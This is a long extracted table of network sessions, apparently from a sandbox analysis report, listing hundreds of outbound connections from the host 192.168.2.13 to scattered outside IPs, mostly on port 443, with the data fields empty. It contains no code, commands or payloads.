                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22828192.168.2.134591438.110.28.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22829192.168.2.1358416178.214.197.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22830192.168.2.1339238162.212.119.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22831192.168.2.1358002129.184.218.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22832192.168.2.1351018188.140.231.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22833192.168.2.1336108209.214.253.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22834192.168.2.1355842107.64.137.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22835192.168.2.1336980134.5.214.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22836192.168.2.1359382108.174.222.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22837192.168.2.1344208105.10.168.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22838192.168.2.135681676.131.181.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22839192.168.2.1353844146.35.31.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22840192.168.2.1357158167.154.239.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22841192.168.2.1339354155.254.53.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22842192.168.2.1342348136.94.172.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22843192.168.2.133771449.99.55.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22844192.168.2.135713443.96.109.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22845192.168.2.135838249.117.7.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22846192.168.2.135218450.88.58.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22847192.168.2.1341484143.248.39.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22848192.168.2.134509454.162.35.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22849192.168.2.135160224.211.55.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22850192.168.2.1340058201.226.243.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22851192.168.2.1339576195.100.213.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22852192.168.2.133886063.214.141.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22853192.168.2.1338974126.193.207.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22854192.168.2.1337086208.187.198.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22855192.168.2.1333704147.149.179.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22856192.168.2.1352108149.124.15.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22857192.168.2.135381848.39.220.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22858192.168.2.1360794136.203.108.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22859192.168.2.135375240.149.29.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22860192.168.2.1342772101.139.216.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22861192.168.2.1356238175.230.212.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22862192.168.2.135860079.60.25.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22863192.168.2.1341670165.21.77.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22864192.168.2.1338584176.54.212.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22865192.168.2.1355592128.171.94.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22866192.168.2.1333658124.44.10.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22867192.168.2.1336186221.201.22.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22868192.168.2.13362024.236.105.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22869192.168.2.134294019.134.173.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22870192.168.2.1346948210.97.89.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22871192.168.2.1343408148.47.192.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22872192.168.2.134247079.54.65.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22873192.168.2.1345932147.23.196.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22874192.168.2.135596423.76.5.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22875192.168.2.1358896196.181.60.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22876192.168.2.1352564192.1.24.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22877192.168.2.1356082171.9.242.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22878192.168.2.1342132138.240.90.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22879192.168.2.1349426107.102.232.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22880192.168.2.1346228141.124.223.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22881192.168.2.1352580136.212.194.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22882192.168.2.135591284.211.225.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22883192.168.2.13546644.88.93.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22884192.168.2.135003861.23.69.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22885192.168.2.134731641.44.122.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22886192.168.2.134162635.159.181.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22887192.168.2.134756251.167.217.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22888192.168.2.1353334112.215.7.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22889192.168.2.1345438142.226.219.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22890192.168.2.1335452195.63.23.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22891192.168.2.13555049.234.88.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22892192.168.2.1339420140.47.197.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22893192.168.2.135079481.157.13.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22894192.168.2.1350936177.166.203.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22895192.168.2.1332774209.231.74.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22896192.168.2.1355688195.57.163.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22897192.168.2.134488257.178.15.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22898192.168.2.133758824.192.88.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22899192.168.2.134931671.5.95.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22900192.168.2.1339238114.107.159.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22901192.168.2.134713877.156.252.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22902192.168.2.134790688.128.13.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22903192.168.2.1349250121.17.182.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22904192.168.2.1345638179.118.154.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22905192.168.2.1350544179.154.166.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22906192.168.2.134764098.54.81.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22907192.168.2.133570044.109.140.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22908192.168.2.133679894.161.139.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22909192.168.2.1336616210.125.72.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22910192.168.2.13402228.192.225.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22911192.168.2.1349508203.130.36.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22912192.168.2.1353544221.11.5.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22913192.168.2.134643475.232.36.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22914192.168.2.134500613.13.26.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22915192.168.2.1341992124.21.22.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22916192.168.2.134092012.93.168.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22917192.168.2.1349114136.42.231.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22918192.168.2.135426888.119.93.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22919192.168.2.135880059.250.242.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22920192.168.2.134353693.60.186.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22921192.168.2.1333454179.50.253.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22922192.168.2.1342278105.49.169.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22923192.168.2.1355212149.180.130.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22924192.168.2.133934451.208.19.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22925192.168.2.1353088122.58.168.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22926192.168.2.134099866.6.189.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22927192.168.2.1342154203.83.13.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22928192.168.2.1357022193.204.16.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22929192.168.2.133765239.134.100.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22930192.168.2.1351182116.13.13.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22931192.168.2.1339094196.14.42.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22932192.168.2.1350692181.170.213.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22933192.168.2.1348746100.179.131.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22934192.168.2.133613825.201.40.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22935192.168.2.1360482110.99.184.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22936192.168.2.1346838170.167.140.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22937192.168.2.1335998121.36.32.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22938192.168.2.134537453.90.165.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22939192.168.2.1348030176.15.148.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22940192.168.2.135472098.57.247.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22941192.168.2.1350598105.106.60.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22942192.168.2.1354730159.42.194.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22943192.168.2.1342712217.200.16.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22944192.168.2.135544057.9.56.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22945192.168.2.134397469.118.123.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22946192.168.2.1360678205.47.97.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22947192.168.2.1340284172.70.204.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22948192.168.2.1333608154.38.253.258080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22949192.168.2.1355856183.64.212.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22950192.168.2.133752470.156.29.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22951192.168.2.1352272141.131.128.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22952192.168.2.1339704212.5.63.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22953192.168.2.1350200104.34.63.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22954192.168.2.1334976161.28.70.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22955192.168.2.1337698151.233.194.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22956192.168.2.1334610223.234.188.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22957192.168.2.1360282177.214.231.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22958192.168.2.1355978165.165.178.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22959192.168.2.1356454160.78.6.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22960192.168.2.134565092.151.190.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22961192.168.2.1351208213.135.167.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22962192.168.2.135638038.54.98.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22963192.168.2.1338678112.159.149.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22964192.168.2.133913479.6.153.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22965192.168.2.134620663.43.38.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22966192.168.2.135341612.163.241.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22967192.168.2.1353916162.63.109.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22968192.168.2.1353150133.104.215.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22969192.168.2.134850225.60.112.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22970192.168.2.1351044207.216.124.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22971192.168.2.133789419.64.255.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22972192.168.2.13569682.88.242.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22973192.168.2.1356094182.81.113.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22974192.168.2.1360930164.54.135.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22975192.168.2.1341010142.0.176.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22976192.168.2.1342038157.253.148.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22977192.168.2.1351796157.203.188.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22978192.168.2.1350928162.29.106.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22979192.168.2.1336792131.118.231.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22980192.168.2.1350414211.239.69.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22981192.168.2.134380283.63.137.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22982192.168.2.1354850144.123.89.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22983192.168.2.134582841.51.215.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22984192.168.2.135290486.9.161.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22985192.168.2.134443842.29.7.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22986192.168.2.1333956209.46.9.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22987192.168.2.1359606176.4.76.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22988192.168.2.1336208114.57.154.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22989192.168.2.1338956126.44.52.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22990192.168.2.1343144199.42.3.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22991192.168.2.1335280137.238.251.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22992192.168.2.1334584104.80.112.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22993192.168.2.133751692.213.38.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22994192.168.2.1337654144.83.64.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22995192.168.2.1360718122.141.241.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22996192.168.2.1350556185.225.220.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22997192.168.2.1341098175.107.244.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22998192.168.2.134201213.135.68.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22999192.168.2.1343688125.150.162.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23000192.168.2.1332874162.56.150.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23001192.168.2.1347560130.115.169.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23002192.168.2.134764431.127.0.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23003192.168.2.133787695.164.103.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23004192.168.2.133909657.66.178.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23005192.168.2.133413480.221.237.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23006192.168.2.1346176143.19.21.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23007192.168.2.133619078.175.126.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23008192.168.2.1342026200.37.58.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23009192.168.2.1352868183.199.247.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23010192.168.2.13345741.143.66.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23011192.168.2.1358326205.80.91.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23012192.168.2.1339606165.99.233.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23013192.168.2.1335914211.225.34.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23014192.168.2.1359424100.145.169.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23015192.168.2.1356100182.170.255.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23016192.168.2.134802419.97.107.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23017192.168.2.135180698.40.30.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23018192.168.2.1340610217.210.130.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23019192.168.2.1334764129.77.188.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23020192.168.2.1337282153.111.153.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23021192.168.2.1346170131.135.102.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23022192.168.2.1355258154.21.167.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23023192.168.2.133782092.92.1.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23024192.168.2.133759073.26.253.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23025192.168.2.1340980169.53.194.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23026192.168.2.135490220.137.16.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23027192.168.2.1354408209.78.27.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23028192.168.2.1349746166.210.182.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23029192.168.2.134233496.48.114.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23030192.168.2.1357286210.38.56.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23031192.168.2.1334592217.109.6.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23032192.168.2.1340130205.15.216.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23033192.168.2.1342306153.71.184.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23034192.168.2.1345754197.94.181.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23035192.168.2.134750014.163.68.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23036192.168.2.135481087.7.239.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23037192.168.2.1350050102.232.187.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23038192.168.2.13434601.236.164.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23039192.168.2.1344950217.19.6.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23040192.168.2.134784874.176.116.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23041192.168.2.135595473.38.232.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23042192.168.2.1357026186.254.146.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23043192.168.2.133634272.144.43.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23044192.168.2.1332844182.32.105.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23045192.168.2.1348738116.249.0.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23046192.168.2.133565086.113.7.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23047192.168.2.135274023.22.203.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23048192.168.2.1349786119.201.48.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23049192.168.2.1337970123.135.6.23443
